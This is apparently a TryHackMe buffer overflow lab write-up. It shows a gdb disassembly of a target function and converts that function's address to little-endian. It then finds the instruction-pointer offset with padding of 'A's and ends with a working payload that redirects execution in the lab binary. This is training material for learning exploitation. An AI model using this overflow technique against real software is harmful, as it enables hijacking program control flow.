Skip to content

THM - Buffer Overflow - T7

Check special function address

(gdb) disassemble special
--> Dump of assembler code for function special:
!!> 0x0000000000400567 <+0>:     push   %rbp             <!!---------
--> 0x0000000000400568 <+1>:     mov    %rsp,%rbp
--> 0x000000000040056b <+4>:     mov    $0x400680,%edi
--> 0x0000000000400570 <+9>:     callq  0x400460 <puts@plt>
--> 0x0000000000400575 <+14>:    mov    $0x40069d,%edi
--> 0x000000000040057a <+19>:    callq  0x400460 <puts@plt>
--> 0x000000000040057f <+24>:    nop
--> 0x0000000000400580 <+25>:    pop    %rbp
--> 0x0000000000400581 <+26>:    retq   
--> End of assembler dump.

little endian

\x00\x00\x00\x40\x05\x67  --> \x67\x05\x40\x00\x00\x00

Control over EIP

gdb func-pointer
run
AAAAAAAAAAAAAAAAAAAA
-- > 0x0000414141414141

Example payload

Payload Response
AAAAAAAAAAAAAA 0x00007fffffffeb27
AAAAAAAAAAAAAAAA 0x0000000000004141
AAAAAAAAAAAAAAAAA 0x0000000000414141
AAAAAAAAAAAAAAAAAA 0x0000000041414141
AAAAAAAAAAAAAAAAAAAA 0x0000414141414141
AAAAAAAAAAAAAA\x67\x05\x40\x00\x00\x00 > you did this, friend!